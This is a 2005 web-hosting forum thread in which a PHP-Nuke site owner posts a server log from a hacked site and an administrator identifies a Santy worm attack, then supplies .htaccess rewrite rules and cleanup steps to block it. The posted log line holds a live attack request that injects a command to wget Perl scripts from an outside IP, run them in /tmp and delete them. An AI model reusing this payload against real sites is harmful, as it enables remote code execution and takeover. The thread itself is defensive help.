Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Lart
Client


Joined: Feb 18, 2004
Posts: 22
Location: Israel

PostPosted: Fri May 20, 2005 12:48 pm Reply with quote

Bellow is a partial portion of my logs on my server, I really wanted to know if there is anything strange here. On the last 2 days I lost total control of my site. Don't know where to start, the modules myaccount, protector, and monitor 2.5 I can't get in could someone give a lead here???

If there is a need I'll PM the link and give access to admin area to check it out.

Please help me!!!!





"GET /themes/israblue/style/style.css HTTP/1.1" 304 - "http://www.xxx.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 9Cool" 64.235.234.123 - - [20/May/2005:11:38:59 -0700] "GET /article-page-16.html?rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
mkdir%20.temp;cd%20.temp;wget%20http://61.85.234.215/.zk/msn.txt;wget%20http://61.85.234.215
/.zk/coll.txt;wget%20http://61.85.234.215/.zk/g.txt;perl%20msn.txt;rm%20msn.txt;perl%20coll.txt;rm%20coll.txt;
perl%20g.txt;rm%20g.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73
%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527'; HTTP/1.1" 200 261567 "-" "LWP::Simple/5.803" 200.218.169.2

TIA,

JLart

_________________
"To reach the savior, all you have to do is to believe." 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri May 20, 2005 6:26 pm Reply with quote

That's a Santy Worm exploit. Are you using NukeSentinel(tm)?

Paste this code in your .htaccess file
Code:
RewriteEngine on

#Check for Santy Worms and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP                   [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders              [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+)              [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos                [NC,OR]
RewriteCond %{REQUEST_URI} ^civa                      [NC,OR]
#variant-6 redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*)            [NC,OR]
#variant-7 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*)      [NC,OR]
#New one 2-2-2005
RewriteCond %{QUERY_STRING} q=emessenger                 [NC]
RewriteRule ^.*$ http://127.0.0.1 [R,L]

Next, use phpMyAdmin and edit your nuke_authors table. Delete any records that are not legitimate and modify the legitimate passwords being sure to select MD5 in the password drop down box. You would also be advised to edit the nuke_users table for those same names.
 
View user's profile Send private message
Lart
PostPosted: Sat May 21, 2005 2:13 am Reply with quote

Hi Raven,

Thanks again for you knowledgable thoughts. Well to answer your first question I don't have Sentinel because the first time I tried to put one of the first version for nuke 7.3 I got locked out of my admin and since then I did'nt try and opted for protector but I will though. Wink .

Regarding your instructions above, I did made a prior check on those tables and the users that were there are the nomal ones. Do you think I should change those too??? the mod rewrite part I already changed and also verified the users table nothing strange.

The only thing that is bothereing me is that, I can't really pin point where this worm comes from, yesterday there were some funny things happening on my cpanel and FTP accounts they simply keep changing.
Is there a possibility tha the host has problems and not passing it on to the users???

10x again,

JLart
 
Raven
PostPosted: Sat May 21, 2005 6:41 am Reply with quote

Lart,

I'm sure you'll understand Smile I have to move those last 2 posts as they gave the public the ability to hack other sites. That is almost assuredly how you were hacked. Get NukeSentinel(TM) installed!
 
Lart
PostPosted: Sat May 21, 2005 7:59 am Reply with quote

Ok Raven really sorry for the posts,

they did get me down for the time being, unfortunatelly I have to travel today and don't have the time to take care of this. But thanks anyways.

I really don't understand why these people waste their time and talent to be so destructive and mess up somebody else work. One think is for sure they did'nt get their names posted in the site.

I really appreciate the help and once again sorry for the posts.

JLart
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©